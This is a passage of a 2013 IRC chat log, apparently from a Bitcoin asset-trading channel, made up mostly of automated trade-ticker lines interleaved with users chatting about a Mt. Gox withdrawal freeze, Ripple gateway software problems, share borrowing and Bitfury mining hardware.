BTC [+] Jul 12 18:17:49 [BTCTC] [DMS.MINING] 8 @ 0.01599 = 0.1279 BTC [+] Jul 12 18:18:02 [BTCTC] [COGNITIVE] 1 @ 0.450001 BTC [+] Jul 12 18:18:20 [BTCTC] [DMS.MINING] 1 @ 0.01599 BTC [+] Jul 12 18:19:46 [BTCTC] [DMS.MINING] 78 @ 0.0158 = 1.2324 BTC [-] Jul 12 18:19:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.042589 = 0.2981 BTC [-] Jul 12 18:20:18 [BTCTC] [BASIC-MINING] 10 @ 0.451001 = 4.51 BTC [+] Jul 12 18:20:56 [BTCTC] [DMS.SELLING] 10 @ 0.0349 = 0.349 BTC [+] Jul 12 18:21:32 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 12 18:21:39 [BTCTC] [DMS.SELLING] 5 @ 0.0349 = 0.1745 BTC [+] Jul 12 18:22:20 [BTCTC] [DMS.MINING] 29 @ 0.016 = 0.464 BTC [+] Jul 12 18:24:24 [BTCTC] [BASIC-MINING] 1 @ 0.451 BTC [-] Jul 12 18:24:26 [BTCTC] [BASIC-MINING] 4 @ 0.451 = 1.804 BTC [-] Jul 12 18:24:27 [BTCTC] [BASIC-MINING] 2 @ 0.45 = 0.9 BTC [-] Jul 12 18:24:28 [BTCTC] [BASIC-MINING] 32 @ 0.45 = 14.4 BTC [-] Jul 12 18:25:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.041322 = 0.3719 BTC [-] Jul 12 18:26:28 [BTCTC] [BASIC-MINING] 1 @ 0.499999 BTC [+] Jul 12 18:27:25 [HAVELOCK] [SDSTM] 500 @ 0.015 = 7.5 BTC [-] Jul 12 18:28:25 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [+] Jul 12 18:28:39 [MPEX] [S.MPOE] 10050 @ 0.00081775 = 8.2184 BTC [-] Jul 12 18:30:01 [BTCTC] [COGNITIVE] 4 @ 0.489991 = 1.96 BTC [+] Jul 12 18:30:42 [BTCTC] [TAT.ASICMINER] 8 @ 0.042489 = 0.3399 BTC [+] Jul 12 18:30:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.04249 = 0.2125 BTC [+] Jul 12 18:30:56 [BTCTC] [DMS.MINING] 29 @ 0.016 = 0.464 BTC [+] Jul 12 18:32:08 [BTCTC] [DMS.SELLING] 13 @ 0.034899 = 0.4537 BTC [-] Jul 12 18:37:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.042489 BTC [-] Jul 12 18:37:45 [BTCTC] [DMS.PURCHASE] 45 @ 0.048759 = 2.1942 BTC [+] Jul 12 18:38:18 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 12 18:39:28 http://67.19.64.18/news/2013/7-10jb/4.png Jul 12 18:39:29 oopsie Jul 12 18:41:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.042489 = 0.2124 BTC [-] Jul 12 18:41:45 [BTCTC] [DMS.MINING] 10 @ 0.016399 = 0.164 BTC [+] Jul 12 18:41:47 [BTCTC] [DMS.MINING] 30 @ 0.0164 = 0.492 BTC [+] Jul 12 18:41:48 [BTCTC] [DMS.MINING] 30 @ 0.0165 = 0.495 BTC [+] Jul 12 18:41:50 [BTCTC] [DMS.MINING] 5 @ 0.017 = 0.085 BTC [+] Jul 12 18:42:47 [MPEX] [S.MPOE] 1954 @ 0.00082022 = 1.6027 BTC [+] Jul 12 18:42:49 [MPEX] [S.MPOE] 13346 @ 0.00082142 = 10.9627 BTC [+] Jul 12 18:43:04 lelz Jul 12 18:43:27 [BTCTC] [BASIC-MINING] 9 @ 0.499999 = 4.5 BTC [+] Jul 12 18:43:28 [BTCTC] [BASIC-MINING] 2 @ 0.499999 = 1 BTC [+] Jul 12 18:43:30 [BTCTC] [BASIC-MINING] 4 @ 0.499999 = 2 BTC [+] Jul 12 18:43:31 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [+] Jul 12 18:43:32 [BTCTC] [BASIC-MINING] 95 @ 0.5 = 47.5 BTC [+] Jul 12 18:45:57 [HAVELOCK] [AM100] 95 @ 0.0405 = 3.8475 BTC [-] Jul 12 18:47:21 [BTCTC] [DMS.MINING] 2 @ 0.0165 = 0.033 BTC [-] Jul 12 18:47:29 how long does it take bets to get approved on bitbet? Jul 12 18:50:42 Props to Wells Fargo Jul 12 18:50:51 That's a neat fun fact. Jul 12 18:52:11 [BTCTC] [ASICMINER-PT] 4 @ 4.267 = 17.068 BTC [-] Jul 12 18:52:13 [BTCTC] [ASICMINER-PT] 1 @ 4.25001 BTC [-] Jul 12 18:52:15 [BTCTC] [ASICMINER-PT] 1 @ 4.233 BTC [-] Jul 12 18:52:18 [BTCTC] [ASICMINER-PT] 1 @ 4.2321 BTC [-] Jul 12 18:53:04 [BTCTC] [S.DICE-PT] 200 @ 0.002128 = 0.4256 BTC [-] Jul 12 18:53:06 [BTCTC] [S.DICE-PT] 1 @ 0.002127 BTC [-] Jul 12 18:53:08 [BTCTC] [S.DICE-PT] 100 @ 0.002126 = 0.2126 BTC [-] Jul 12 18:53:09 [BTCTC] [S.DICE-PT] 150 @ 0.002125 = 0.3188 BTC [-] Jul 12 18:53:11 [BTCTC] [S.DICE-PT] 5 @ 0.002112 = 0.0106 BTC [-] Jul 12 18:53:12 [BTCTC] [S.DICE-PT] 45 @ 0.002112 = 0.095 BTC [-] Jul 12 18:53:14 [BTCTC] [S.DICE-PT] 30 @ 0.00211 = 0.0633 BTC [-] Jul 12 18:53:14 [BTCTC] [S.DICE-PT] 100 @ 0.00211 = 0.211 BTC [-] Jul 12 18:53:16 [BTCTC] [S.DICE-PT] 150 @ 0.002105 = 0.3158 BTC [-] Jul 12 18:53:17 [BTCTC] [S.DICE-PT] 250 @ 0.002102 = 0.5255 BTC [-] Jul 12 18:53:19 [BTCTC] [S.DICE-PT] 50 @ 0.0021 = 0.105 BTC [-] Jul 12 18:53:20 [BTCTC] [S.DICE-PT] 150 @ 0.00206 = 0.309 BTC [-] Jul 12 18:53:22 [BTCTC] [S.DICE-PT] 100 @ 0.00205 = 0.205 BTC [-] Jul 12 18:53:23 [BTCTC] [S.DICE-PT] 100 @ 0.002021 = 0.2021 BTC [-] Jul 12 18:53:24 [BTCTC] [S.DICE-PT] 100 @ 0.002015 = 0.2015 BTC [-] Jul 12 18:53:26 [BTCTC] [S.DICE-PT] 100 @ 0.002011 = 0.2011 BTC [-] Jul 12 18:53:27 [BTCTC] [S.DICE-PT] 100 @ 0.00201 = 0.201 BTC [-] Jul 12 18:53:27 [BTCTC] [S.DICE-PT] 800 @ 0.002001 = 1.6008 BTC [-] Jul 12 18:54:23 [BTCTC] [AMC-PT] 39900 @ 0.0025 = 99.75 BTC [+] Jul 12 18:55:27 [BTCTC] [DMS.SELLING] 41 @ 0.034899 = 1.4309 BTC [-] Jul 12 18:55:28 [BTCTC] [DMS.SELLING] 42 @ 0.0349 = 1.4658 BTC [+] Jul 12 18:55:30 [BTCTC] [DMS.SELLING] 109 @ 0.035049 = 3.8203 BTC [+] Jul 12 18:55:32 [BTCTC] [DMS.SELLING] 4 @ 0.03505 = 0.1402 BTC [+] Jul 12 18:55:34 [BTCTC] [DMS.SELLING] 387 @ 0.03505 = 13.5644 BTC [+] Jul 12 18:55:35 [BTCTC] [DMS.SELLING] 58 @ 0.03508 = 2.0346 BTC [+] Jul 12 18:55:37 [BTCTC] [DMS.MINING] 18 @ 0.0165 = 0.297 BTC [-] Jul 12 18:55:39 [BTCTC] [DMS.SELLING] 95 @ 0.035101 = 3.3346 BTC [+] Jul 12 18:55:40 [BTCTC] [DMS.SELLING] 50 @ 0.035411 = 1.7706 BTC [+] Jul 12 18:55:41 [BTCTC] [DMS.SELLING] 14 @ 0.035688 = 0.4996 BTC [+] Jul 12 18:56:37 [BTCTC] [AMC-PT] 8 @ 0.00249 = 0.0199 BTC [-] Jul 12 18:57:01 [BTCTC] [BASIC-MINING] 10 @ 0.499999 = 5 BTC [-] Jul 12 18:57:03 [BTCTC] [BASIC-MINING] 5 @ 0.5 = 2.5 BTC [+] Jul 12 18:57:04 [BTCTC] [BASIC-MINING] 6 @ 0.5 = 3 BTC [+] Jul 12 18:57:10 [BTCTC] [DMS.MINING] 5 @ 0.0165 = 0.0825 BTC [-] Jul 12 18:57:24 lol ya Jul 12 18:57:34 [BTCTC] [DMS.SELLING] 2 @ 0.03525 = 0.0705 BTC [-] Jul 12 18:58:13 [BTCTC] [BASIC-MINING] 25 @ 0.51 = 12.75 BTC [+] Jul 12 18:58:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00414 = 0.0414 BTC [-] Jul 12 18:59:10 [BTCTC] [DMS.MINING] 22 @ 0.0165 = 0.363 BTC [-] Jul 12 18:59:19 [BTCTC] [DMS.SELLING] 30 @ 0.03525 = 1.0575 BTC [-] Jul 12 19:00:36 [BTCTC] [DMS.MINING] 1 @ 0.0165 BTC [-] Jul 12 19:03:00 [BTCTC] [DMS.MINING] 1 @ 0.016999 BTC [+] Jul 12 19:03:05 [HAVELOCK] [SDSTM] 1 @ 0.01488 BTC [-] Jul 12 19:03:15 [BTCTC] [DMS.SELLING] 40 @ 0.0353 = 1.412 BTC [+] Jul 12 19:05:42 [BTCTC] [BASIC-MINING] 2 @ 0.549 = 1.098 BTC [+] Jul 12 19:05:43 [BTCTC] [BASIC-MINING] 3 @ 0.549989 = 1.65 BTC [+] Jul 12 19:06:56 [BTCTC] [DMS.SELLING] 7 @ 0.0354 = 0.2478 BTC [+] Jul 12 19:09:27 [BTCTC] [BASIC-MINING] 5 @ 0.549989 = 2.7499 BTC [+] Jul 12 19:09:30 [BTCTC] [BASIC-MINING] 2 @ 0.549989 = 1.1 BTC [+] Jul 12 19:09:55 [BTCTC] [BASIC-MINING] 1 @ 0.54999 BTC [+] Jul 12 19:10:18 [BTCTC] [BASIC-MINING] 4 @ 0.55 = 2.2 BTC [+] Jul 12 19:10:33 [HAVELOCK] [AM100] 20 @ 0.04049999 = 0.81 BTC [-] Jul 12 19:11:09 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:11:30 SDSTM still trading at 0.01488? Jul 12 19:11:38 [HAVELOCK] [SDSTM] 2 @ 0.01489 = 0.0298 BTC [+] Jul 12 19:11:43 Anyone has shares to let me borrow? Jul 12 19:11:55 [HAVELOCK] [SDSTM] 1 @ 0.01489 BTC [+] Jul 12 19:12:39 [HAVELOCK] [AM100] 1 @ 0.04049999 BTC [-] Jul 12 19:13:32 lol gl. Jul 12 19:13:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.042489 = 0.6373 BTC [-] Jul 12 19:14:04 [BTCTC] [ASICMINER-PT] 1 @ 4.232 BTC [-] Jul 12 19:14:12 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:14:18 [BTCTC] [TAT.ASICMINER] 71 @ 0.041323 = 2.9339 BTC [-] Jul 12 19:14:24 Borrowing shares is almost impossible around here. Jul 12 19:14:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.041323 BTC [-] Jul 12 19:15:05 i'd borrow them too :) Jul 12 19:15:12 [BTCTC] [TAT.ASICMINER] 21 @ 0.041322 = 0.8678 BTC [-] Jul 12 19:15:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.042489 = 0.2124 BTC [+] Jul 12 19:15:27 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 12 19:15:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.042489 = 0.085 BTC [+] Jul 12 19:15:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.041322 = 0.4959 BTC [-] Jul 12 19:16:05 [BTCTC] [BASIC-MINING] 8 @ 0.55 = 4.4 BTC [+] Jul 12 19:16:10 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:16:12 I should start a service for borrowing shares. Ask for a large deposit that would basically cover a large price increase. It would require some capital, but would let you short something if you so wishes. Jul 12 19:16:13 [BTCTC] [ASICMINER-PT] 4 @ 4.23 = 16.92 BTC [-] Jul 12 19:16:14 [BTCTC] [BASIC-MINING] 2 @ 0.55 = 1.1 BTC [+] Jul 12 19:16:33 [HAVELOCK] [SDSTM] 6 @ 0.0147 = 0.0882 BTC [-] Jul 12 19:16:50 [BTCTC] [BASIC-MINING] 2 @ 0.55 = 1.1 BTC [+] Jul 12 19:16:57 [BTCTC] [BASIC-MINING] 4 @ 0.55 = 2.2 BTC [+] Jul 12 19:16:58 [BTCTC] [DMS.MINING] 4 @ 0.016999 = 0.068 BTC [+] Jul 12 19:17:02 [HAVELOCK] [SDSTM] 14 @ 0.0147 = 0.2058 BTC [-] Jul 12 19:17:09 [HAVELOCK] [SDSTM] 26 @ 0.0147 = 0.3822 BTC [-] Jul 12 19:17:11 [BTCTC] [BASIC-MINING] 15 @ 0.55 = 8.25 BTC [+] Jul 12 19:17:24 [BTCTC] [DMS.SELLING] 20 @ 0.03525 = 0.705 BTC [-] Jul 12 19:17:27 [BTCTC] [TAT.ASICMINER] 17 @ 0.041322 = 0.7025 BTC [-] Jul 12 19:17:44 [HAVELOCK] [SDSTM] 22 @ 0.0147 = 0.3234 BTC [-] Jul 12 19:17:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.041321 = 1.2396 BTC [-] Jul 12 19:17:57 Namworld kinda hard to do when the only people holdin them are the issuers :) Jul 12 19:18:03 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:18:13 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:18:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.04131 = 0.1239 BTC [-] Jul 12 19:18:26 [HAVELOCK] [AM100] 63 @ 0.04049999 = 2.5515 BTC [-] Jul 12 19:18:47 [BTCTC] [DMS.MINING] 1 @ 0.01651 BTC [-] Jul 12 19:18:55 [BTCTC] [BASIC-MINING] 3 @ 0.55 = 1.65 BTC [+] Jul 12 19:19:06 [BTCTC] [COGNITIVE] 3 @ 0.45 = 1.35 BTC [-] Jul 12 19:19:08 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [-] Jul 12 19:19:51 [BTCTC] [ASICMINER-PT] 2 @ 4.299989 = 8.6 BTC [+] Jul 12 19:20:32 [BTCTC] [DMS.SELLING] 12 @ 0.033 = 0.396 BTC [-] Jul 12 19:20:33 [BTCTC] [DMS.MINING] 5 @ 0.016999 = 0.085 BTC [+] Jul 12 19:20:37 [BTCTC] [DMS.SELLING] 20 @ 0.032001 = 0.64 BTC [-] Jul 12 19:20:40 [MPEX] [S.MPOE] 16150 @ 0.00081775 = 13.2067 BTC [-] Jul 12 19:20:41 [BTCTC] [DMS.SELLING] 15 @ 0.032 = 0.48 BTC [-] Jul 12 19:20:43 [BTCTC] [DMS.SELLING] 119 @ 0.0301 = 3.5819 BTC [-] Jul 12 19:20:46 [BTCTC] [DMS.SELLING] 76 @ 0.0301 = 2.2876 BTC [-] Jul 12 19:20:52 [BTCTC] [DMS.SELLING] 3 @ 0.03 = 0.09 BTC [-] Jul 12 19:20:56 [BTCTC] [DMS.SELLING] 50 @ 0.0285 = 1.425 BTC [-] Jul 12 19:20:58 [BTCTC] [DMS.SELLING] 1 @ 0.02832 BTC [-] Jul 12 19:21:00 [BTCTC] [DMS.SELLING] 68 @ 0.028 = 1.904 BTC [-] Jul 12 19:21:04 [BTCTC] [DMS.SELLING] 2 @ 0.028 = 0.056 BTC [-] Jul 12 19:21:08 [BTCTC] [DMS.SELLING] 165 @ 0.028 = 4.62 BTC [-] Jul 12 19:21:42 [HAVELOCK] [AM100] 16 @ 0.04049999 = 0.648 BTC [-] Jul 12 19:21:51 [HAVELOCK] [AM100] 9 @ 0.0401 = 0.3609 BTC [-] Jul 12 19:21:58 [HAVELOCK] [AM100] 85 @ 0.0401 = 3.4085 BTC [-] Jul 12 19:22:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00414 BTC [-] Jul 12 19:22:26 [BTCTC] [DMS.SELLING] 20 @ 0.027011 = 0.5402 BTC [-] Jul 12 19:22:42 [BTCTC] [DMS.SELLING] 10 @ 0.02701 = 0.2701 BTC [-] Jul 12 19:22:54 [BTCTC] [DMS.SELLING] 40 @ 0.025 = 1 BTC [-] Jul 12 19:23:09 [BTCTC] [DMS.SELLING] 5 @ 0.028 = 0.14 BTC [+] Jul 12 19:23:13 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:23:15 [BTCTC] [DMS.SELLING] 1 @ 0.03 BTC [+] Jul 12 19:23:22 [HAVELOCK] [AM100] 94 @ 0.040001 = 3.7601 BTC [-] Jul 12 19:23:24 [HAVELOCK] [AM100] 10 @ 0.04 = 0.4 BTC [-] Jul 12 19:23:25 [BTCTC] [DMS.SELLING] 4 @ 0.022357 = 0.0894 BTC [-] Jul 12 19:23:26 [HAVELOCK] [AM100] 96 @ 0.04 = 3.84 BTC [-] Jul 12 19:23:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.04239 = 0.2543 BTC [+] Jul 12 19:23:43 [BTCTC] [DMS.SELLING] 63 @ 0.0212 = 1.3356 BTC [-] Jul 12 19:23:52 [BTCTC] [DMS.SELLING] 1 @ 0.0279 BTC [+] Jul 12 19:24:49 [BTCTC] [AMC-PT] 210 @ 0.0025 = 0.525 BTC [+] Jul 12 19:24:55 [HAVELOCK] [SDSTM] 10 @ 0.0148 = 0.148 BTC [+] Jul 12 19:25:12 [HAVELOCK] [AM100] 13 @ 0.04 = 0.52 BTC [-] Jul 12 19:25:48 [BTCTC] [DMS.SELLING] 5 @ 0.025 = 0.125 BTC [-] Jul 12 19:26:08 [HAVELOCK] [HIM] 14 @ 0.26101 = 3.6541 BTC [+] Jul 12 19:26:32 [HAVELOCK] [SDSTM] 27 @ 0.0148 = 0.3996 BTC [+] Jul 12 19:26:40 [BTCTC] [DMS.SELLING] 15 @ 0.025 = 0.375 BTC [-] Jul 12 19:27:26 [BTCTC] [DMS.SELLING] 38 @ 0.025 = 0.95 BTC [-] Jul 12 19:27:46 [BTCTC] [DMS.SELLING] 1 @ 0.025 BTC [-] Jul 12 19:27:53 [BTCTC] [PAJKA.BOND] 24 @ 0.050056 = 1.2013 BTC [-] Jul 12 19:27:55 [BTCTC] [PAJKA.BOND] 1 @ 0.050055 BTC [-] Jul 12 19:27:58 [BTCTC] [DMS.SELLING] 28 @ 0.025 = 0.7 BTC [-] Jul 12 19:27:59 [BTCTC] [PAJKA.BOND] 10 @ 0.050054 = 0.5005 BTC [-] Jul 12 19:28:03 [BTCTC] [PAJKA.BOND] 40 @ 0.050001 = 2 BTC [-] Jul 12 19:28:04 [BTCTC] [DMS.SELLING] 2 @ 0.025 = 0.05 BTC [-] Jul 12 19:28:07 [BTCTC] [PAJKA.BOND] 10 @ 0.05 = 0.5 BTC [-] Jul 12 19:28:11 [BTCTC] [DMS.MINING] 1 @ 0.016999 BTC [+] Jul 12 19:28:17 [HAVELOCK] [SDSTM] 31 @ 0.0148 = 0.4588 BTC [+] Jul 12 19:28:38 [BTCTC] [DMS.MINING] 1 @ 0.017 BTC [+] Jul 12 19:28:58 [HAVELOCK] [SDSTM] 15 @ 0.01489 = 0.2234 BTC [+] Jul 12 19:29:24 [BTCTC] [BITVPS] 10 @ 0.002189 = 0.0219 BTC [+] Jul 12 19:29:51 [BTCTC] [DMS.MINING] 11 @ 0.017 = 0.187 BTC [+] Jul 12 19:29:53 [BTCTC] [DMS.MINING] 5 @ 0.0173 = 0.0865 BTC [+] Jul 12 19:29:54 [BTCTC] [DMS.MINING] 20 @ 0.0173 = 0.346 BTC [+] Jul 12 19:29:55 [BTCTC] [DMS.MINING] 33 @ 0.0174 = 0.5742 BTC [+] Jul 12 19:29:56 [BTCTC] [DMS.MINING] 25 @ 0.0174 = 0.435 BTC [+] Jul 12 19:29:57 [BTCTC] [DMS.MINING] 11 @ 0.017799 = 0.1958 BTC [+] Jul 12 19:29:59 [BTCTC] [DMS.MINING] 6 @ 0.017799 = 0.1068 BTC [+] Jul 12 19:30:16 http://thegenesisblock.com/mt-gox-withdrawal-freeze-driving-significant-liquidity-concerns/ Jul 12 19:30:23 [BTCTC] [DMS.MINING] 1 @ 0.017 BTC [-] Jul 12 19:30:28 [BTCTC] [DMS.MINING] 1 @ 0.016999 BTC [-] Jul 12 19:30:32 [BTCTC] [DMS.MINING] 9 @ 0.01651 = 0.1486 BTC [-] Jul 12 19:30:36 [BTCTC] [DMS.MINING] 27 @ 0.0165 = 0.4455 BTC [-] Jul 12 19:30:48 [BTCTC] [DMS.SELLING] 99 @ 0.025 = 2.475 BTC [-] Jul 12 19:30:50 [BTCTC] [DMS.MINING] 65 @ 0.0161 = 1.0465 BTC [-] Jul 12 19:31:01 [BTCTC] [DMS.MINING] 1 @ 0.016001 BTC [-] Jul 12 19:31:04 [BTCTC] [DMS.MINING] 65 @ 0.016 = 1.04 BTC [-] Jul 12 19:31:22 hello hello Jul 12 19:31:26 [BTCTC] [DMS.SELLING] 20 @ 0.025 = 0.5 BTC [-] Jul 12 19:31:35 hii Jul 12 19:31:39 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:31:49 [BTCTC] [DMS.SELLING] 18 @ 0.025 = 0.45 BTC [-] Jul 12 19:31:58 [BTCTC] [DMS.SELLING] 18 @ 0.025 = 0.45 BTC [-] Jul 12 19:32:15 [BTCTC] [TAT.ASICMINER] 23 @ 0.041311 = 0.9502 BTC [-] Jul 12 19:32:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.04131 = 0.4957 BTC [-] Jul 12 19:32:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.041309 BTC [-] Jul 12 19:32:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.041307 = 0.4131 BTC [-] Jul 12 19:32:24 [BTCTC] [TAT.ASICMINER] 35 @ 0.0413 = 1.4455 BTC [-] Jul 12 19:32:38 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [+] Jul 12 19:32:45 [BTCTC] [BASIC-MINING] 4 @ 0.55 = 2.2 BTC [+] Jul 12 19:33:25 [BTCTC] [DMS.SELLING] 25 @ 0.025 = 0.625 BTC [-] Jul 12 19:33:28 [BTCTC] [DMS.PURCHASE] 94 @ 0.040366 = 3.7944 BTC [-] Jul 12 19:33:45 [BTCTC] [DMS.SELLING] 9 @ 0.025 = 0.225 BTC [-] Jul 12 19:35:54 [BTCTC] [DMS.PURCHASE] 200 @ 0.040366 = 8.0732 BTC [-] Jul 12 19:36:10 deadweasel did they freeze it again ? Jul 12 19:36:26 [HAVELOCK] [AM100] 141 @ 0.04 = 5.64 BTC [-] Jul 12 19:36:32 no Jul 12 19:36:51 mircea_popescu do you have any xrp? Jul 12 19:36:54 " Mt. Gox is happy to announce that global account withdrawals have now fully resumed as of today, after several days of testing our new system for processing transactions." Jul 12 19:37:09 guys Jul 12 19:37:14 Anduck: The person who started teh first ripple exchange does. ;) Jul 12 19:37:14 [BTCTC] [DMS.MINING] 20 @ 0.0161 = 0.322 BTC [+] Jul 12 19:37:16 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 12 19:37:18 pox2 source? Jul 12 19:37:19 [BTCTC] [DMS.MINING] 10 @ 0.01599 = 0.1599 BTC [-] Jul 12 19:37:24 Ukto: what xrp exchange? Jul 12 19:37:28 elchespirito yea ? Jul 12 19:37:28 what's going on with dms.selling Jul 12 19:37:33 well, the first ripple 'gatewa' i should write Jul 12 19:37:34 Anduck nope Jul 12 19:37:38 https://mtgox.com/press_release_20130704.html Jul 12 19:37:38 gateway Jul 12 19:37:39 how come the price dropped so sharply? Jul 12 19:37:39 Ukto: who was it? Jul 12 19:37:40 Mt.Gox - Bitcoin Exchange Jul 12 19:37:43 but that's old news Jul 12 19:37:44 Anduck: .. me... Jul 12 19:37:49 elchespirito isn't that deprived's asset ? Jul 12 19:37:51 Ukto: what gateway is it? =O Jul 12 19:37:54 WeExchange Jul 12 19:37:57 ah Jul 12 19:37:57 mircea_popescu: yea Jul 12 19:38:03 so prolly best ask him. Jul 12 19:38:10 where's he? Jul 12 19:38:18 Ukto have u tried www.rippleflip.com or ripplespin? Jul 12 19:38:19 pardon my ignorance Jul 12 19:38:29 elchespirito, because of recent whale buys, the liquidity is low Jul 12 19:38:31 i just looked at the wallet sizes Jul 12 19:38:33 lol Jul 12 19:38:39 1.5 million xrp on spin Jul 12 19:38:48 Anduck: No, dont really work with ripple so much anymore Jul 12 19:38:49 [BTCTC] [DMS.PURCHASE] 1000 @ 0.040366 = 40.366 BTC [-] Jul 12 19:38:55 elchespirito prolly on bitcointalk Jul 12 19:38:55 [BTCTC] [DMS.MINING] 10 @ 0.017 = 0.17 BTC [+] Jul 12 19:39:00 Ukto : ok Jul 12 19:39:10 saulimus: I will assume that whale buys means people who take over a lot of the stocks? Jul 12 19:39:10 Anduck: Their software has caused weexchange much hardship and poor reviews Jul 12 19:39:12 ripple is brokended Jul 12 19:39:14 bitcointalk? Jul 12 19:39:16 [HAVELOCK] [AM100] 71 @ 0.0405 = 2.8755 BTC [+] Jul 12 19:39:24 Ukto: ripple? it's been failing hard lately afaik Jul 12 19:39:38 elchespirito, ah, sorry, thought you meant bitcoin price Jul 12 19:39:44 although bitstamp's been good Jul 12 19:39:46 they setup and provided me a server recently so ppl could collect funds. their own install, constantly restarts itself "known bug" they say Jul 12 19:39:52 and it takes hours for it to catch up Jul 12 19:39:54 ah, no, I mean the dms.purchase funds Jul 12 19:40:00 my bad Jul 12 19:40:01 [BTCTC] [BASIC-MINING] 4 @ 0.5999 = 2.3996 BTC [+] Jul 12 19:40:02 Ukto: yeah.. it shouldnt take hours to catch up, though?? Jul 12 19:40:10 [HAVELOCK] [AM1] 1 @ 4.371 BTC [+] Jul 12 19:40:15 their servers go down when someone starts spamming shit Jul 12 19:40:34 [BTCTC] [DMS.SELLING] 3 @ 0.025 = 0.075 BTC [-] Jul 12 19:40:52 [BTCTC] [DMS.MINING] 75 @ 0.0158 = 1.185 BTC [-] Jul 12 19:41:06 no, it shouldnt Jul 12 19:41:12 their sootware sucks Jul 12 19:41:14 hmmm Jul 12 19:41:15 plain and simple Jul 12 19:41:18 Ukto uhh Jul 12 19:41:18 Ukto badly. Jul 12 19:41:23 i've done some tests on the ripple Jul 12 19:41:25 s1.ripple Jul 12 19:41:31 i was able to crash ripple Jul 12 19:41:33 i have done some tests too, broke everything Jul 12 19:41:33 and i've been able to catch up like 10000 ledgers in no time Jul 12 19:41:39 doing websocket calls Jul 12 19:41:40 Ukto: it's not very hard.. xD Jul 12 19:41:44 no its not Jul 12 19:41:59 they need about a year of beta Jul 12 19:42:01 at this point Jul 12 19:42:04 true Jul 12 19:42:07 well, depends Jul 12 19:42:11 i think it's working quite well already Jul 12 19:42:11 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.00414 = 0.0911 BTC [-] Jul 12 19:42:12 [BTCTC] [DMS.PURCHASE] 17 @ 0.040366 = 0.6862 BTC [-] Jul 12 19:42:18 but it needs serious fixing on some parts Jul 12 19:42:20 mostly stability Jul 12 19:43:29 mostly they should go back to the hole they came from Jul 12 19:43:58 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 12 19:44:01 kakobreklaa whatcha think of the bitfury chip? Jul 12 19:44:24 i ordered a BFSB product.. they manufacture them in finland (and i live in finland so it's 5/5 super awesome) Jul 12 19:44:42 bfsb? Jul 12 19:44:48 bitfurystrikesback Jul 12 19:45:00 hmm was it you who tested the bitfury chip at bitcointalk? Jul 12 19:45:15 well i got one chip running just under 2gh on a test pcb Jul 12 19:45:18 yeah Jul 12 19:45:20 and waiting for new pcbs Jul 12 19:45:26 prolly early next week Jul 12 19:45:28 c-shape? Jul 12 19:45:30 [BTCTC] [BASIC-MINING] 8 @ 0.6 = 4.8 BTC [+] Jul 12 19:45:39 no Jul 12 19:45:46 whose boards? Jul 12 19:45:50 our own Jul 12 19:45:52 nice Jul 12 19:45:56 who "our" ? Jul 12 19:46:03 is MP invested? Jul 12 19:46:08 no Jul 12 19:46:17 ok =P Jul 12 19:46:27 you making your own asics for personal use? Jul 12 19:46:36 mostly Jul 12 19:46:43 why not use cshape board and overclock it? Jul 12 19:46:43 [BTCTC] [BASIC-MINING] 8 @ 0.6 = 4.8 BTC [+] Jul 12 19:46:49 ill sell gear too for those who want it, prolly Jul 12 19:46:51 [BTCTC] [BASIC-MINING] 10 @ 0.570001 = 5.7 BTC [-] Jul 12 19:46:53 [BTCTC] [BASIC-MINING] 2 @ 0.57 = 1.14 BTC [-] Jul 12 19:46:54 [BTCTC] [BASIC-MINING] 12 @ 0.567 = 6.804 BTC [-] Jul 12 19:46:59 kakobreklaa nice, will you do active cooling? Jul 12 19:47:09 BFSB does passive cooling, they said even heatsinks are not needed¨ Jul 12 19:47:13 [BTCTC] [DMS.PURCHASE] 42 @ 0.040366 = 1.6954 BTC [-] Jul 12 19:47:14 [HAVELOCK] [SDSTM] 8 @ 0.0143 = 0.1144 BTC [-] Jul 12 19:47:16 [HAVELOCK] [SDSTM] 2 @ 0.0143 = 0.0286 BTC [-] Jul 12 19:47:16 1,5 ghash/chip though Jul 12 19:47:17 [HAVELOCK] [SDSTM] 3 @ 0.0143 = 0.0429 BTC [-] Jul 12 19:47:17 what about reactive cooling? :P Jul 12 19:47:17 [HAVELOCK] [SDSTM] 1 @ 0.0143 BTC [-] Jul 12 19:47:24 [BTCTC] [DMS.PURCHASE] 2 @ 0.040366 = 0.0807 BTC [-] Jul 12 19:47:26 imma gonna push them to the max Jul 12 19:47:27 [HAVELOCK] [SDSTM] 2 @ 0.01420001 = 0.0284 